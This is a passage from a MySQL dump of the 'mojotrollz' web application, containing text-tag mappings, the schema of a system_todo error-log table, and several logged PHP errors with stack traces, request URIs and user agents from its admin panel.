VALUES ('sai_menu_cron', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_docu', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_docu', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_files', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_files', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_git', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_git', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_log', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_log', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_login', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_login', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_logout', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_logout', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_mod', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_mod', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_page', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_page', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_security', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_security', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_start', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_start', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_text', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_text', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_todo', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_menu_todo', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_mod_login_text', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_mod_login_text', 'sai_login'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_mod_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_mod_title', 'sai_mod'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_page_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_page_title', 'sai_page'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_security_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_security_title', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_start_welcome', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_start_welcome', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_start_welcome_description', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_start_welcome_description', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_text_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_text_title', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_title', 'sai_default'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_todo_title', 'sai'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('sai_todo_title', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('server_version', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('spawn_friendlist_title', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('spawn_info_text', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('spawn_info_title', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_action', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_action', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_all', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_all', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_all', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_assignee', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_assignee', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_assignees', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_assignees', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_author', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_author', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_author', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_author_edit', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_author_edit', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_class', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_class', 'sai_mod'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_class', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_class', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_class', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_closed', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_closed', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_closed', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_code', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_code', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_count', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_count', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_done', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_done', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_email', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_email', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_file', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_file', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_file', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_file', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_http_referer', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_http_referer', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_http_referer', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_http_user_agent', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_http_user_agent', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_http_user_agent', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_id', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_id', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_id', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_id', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_id', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_interface', 'sai_mod'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_interface', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_ip', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_ip', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_ip', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_ip', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_join_date', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_join_date', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_lang', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_lang', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_language', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_language', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_last_active', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_last_active', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_line', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_line', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_line', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_line', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_message', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_message', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_message', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_message', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_name', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_name', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_open', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_open', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_open', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_percentage', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_percentage', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_percentage', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_post', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_post', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_priority', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_priority', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_project', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_project', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_property', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_property', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_property', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_querytime', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_querytime', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_querytime', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_querytime', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_request_uri', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_request_uri', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_reset_password', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_reset_password', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_server_name', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_server_name', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_server_port', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_server_port', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_text', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_text', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_thrown', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_thrown', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_time', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_time', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_time', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_time_create', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_time_create', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_time_edit', 'sai_text'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_time_edit', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_trace', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_trace', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_url', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_url', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_url', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_url', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_user', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_user', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_user', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_user', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_username', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_username', 'sai_start'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_username', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_username', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_value', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_value', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_value', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_version', 'sai_mod'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('table_version', 'table'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago', 'time'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_day', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_day', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_day', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_day', 'time'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_hour', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_hour', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_hour', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_hour', 'time'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_minute', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_minute', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_minute', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_minute', 'time'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_month', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_month', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_month', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_month', 'time'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_second', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_second', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_second', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_second', 'time'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_year', 'sai_log'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_year', 'sai_security'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_year', 'sai_todo'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('time_ago_year', 'time'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('url_realmlistwtf', 'mojotrollz'); INSERT INTO `system_text_tag` (`id`, `tag`) VALUES ('url_wowclient', 'mojotrollz'); /*!40000 ALTER TABLE `system_text_tag` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_todo CREATE TABLE IF NOT EXISTS `system_todo` ( `ID` int(10) NOT NULL AUTO_INCREMENT, `class` text NOT NULL, `message` text NOT NULL, `message_hash` char(40) NOT NULL, `code` int(10) unsigned NOT NULL, `file` char(255) NOT NULL, `line` int(11) NOT NULL, `trace` text NOT NULL, `ip` text NOT NULL, `querytime` double NOT NULL, `time` datetime NOT NULL, `server_name` char(255) NOT NULL, `server_port` int(10) unsigned NOT NULL, `request_uri` char(255) NOT NULL, `post` text NOT NULL, `http_referer` char(255) NOT NULL, `http_user_agent` text NOT NULL, `user` int(10) unsigned NOT NULL, `thrown` bit(1) NOT NULL, `type` int(11) NOT NULL DEFAULT '0', `count` int(11) NOT NULL DEFAULT '1', `state` int(11) NOT NULL DEFAULT '0', `priority` int(11) NOT NULL DEFAULT '0', `time_closed` datetime DEFAULT NULL, PRIMARY KEY (`ID`), UNIQUE KEY `file_line_message` (`file`,`line`,`message_hash`) ) ENGINE=MyISAM AUTO_INCREMENT=969 DEFAULT CHARSET=utf8; -- Exportiere Daten aus Tabelle host_mojotrollz.system_todo: 877 rows /*!40000 ALTER TABLE `system_todo` DISABLE KEYS */; INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (92, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'${tree1_img}\' found.', '77698ab95d2de11ed15765a05d7a83c57270be08', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_tree\', \'${tree1_img}\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_tree\', \'${tree1_img}\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.064, '2014-11-06 20:13:34', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_tree&id=${tree1_img}', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 46, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (93, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'${tree2_img}\' found.', 'c4461efe2fa733d72db393b2e3e1121bada92203', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_tree\', \'${tree2_img}\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_tree\', \'${tree2_img}\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.06, '2014-11-06 20:13:34', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_tree&id=${tree2_img}', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 46, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (94, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'${tree3_img}\' found.', '890ebee03d1704a2444ac6dbf7952d4c01c18ed3', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_tree\', \'${tree3_img}\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_tree\', \'${tree3_img}\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.004, '2014-11-06 20:13:34', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_tree&id=${tree3_img}', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 45, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (95, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Unknown column \'type\' in \'field list\'', 'a4bab2624023821476b594a0e510fd3dd0ff2932', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(33): SYSTEM\\DB\\ConnectionMYS->prepare(\'SYSTEM\\\\DBD\\\\SYSSS_..\' \'SELECT `class`,...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'SYSTEM\\\\DBD\\\\SYSSS_..\' \'SELECT `class`,...\', Array)\n#2 /home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php(65): SYSTEM\\DB\\QP::QQ(Array)\n#3 /home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php(82): SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_filter()\n#4 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_log()\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'\\\\SYSTEEM\\\\SAI\\\\sssai.\',Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.197', 0.036, '2014-11-03 22:09:44', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=log', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (96, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: class Verifier: UINT', '82824fc7b8016c458fc75a329ede2b5b4576865e', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 156, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 5100, \'tree_edit\', \'\\\\SYSTEEM\\\\API\\\\vvver.)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.197', 0.016, '2014-11-03 22:11:56', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_skilltree&action=tree_edit&class=${$class}&t1n=undefined&t1i=undefined&t2n=undefined&t2i=undefined&t3n=undefined&t3i=undefined', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (97, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\SKILLTREE_TREE_EDIT', '06958952ce89a2d3cf46ddc1e3f37d1e39e11597', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\SKKILLTREE_T...)\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_skilltree/saimod_mojotrollz_skilltree.php(21): spl_autoload_call(\'DBD\\\\SKKILLTREE_T...)\n#2 [internal function]: saimod_mojotrollz_skilltree::sai_mod_saimod_mojotrollz_skilltree_action_tree_edit(\'1\', \'Fury\', \'${tree1_img}\', \'Bersi\', \'${tree2_img}\', \'Def\', \'${tree3_img}\')\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#5 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.148.197', 0.032, '2014-11-03 22:14:50', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_skilltree&action=tree_edit&class=1&t1n=Fury&t1i=${tree1_img}&t2n=Bersi&t2i=${tree2_img}&t3n=Def&t3i=${tree3_img}', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (98, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: tree Verifier: INT', '0a968bc2d9838f26e03ec8bf7023f5622eae0e54', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 156, '#0 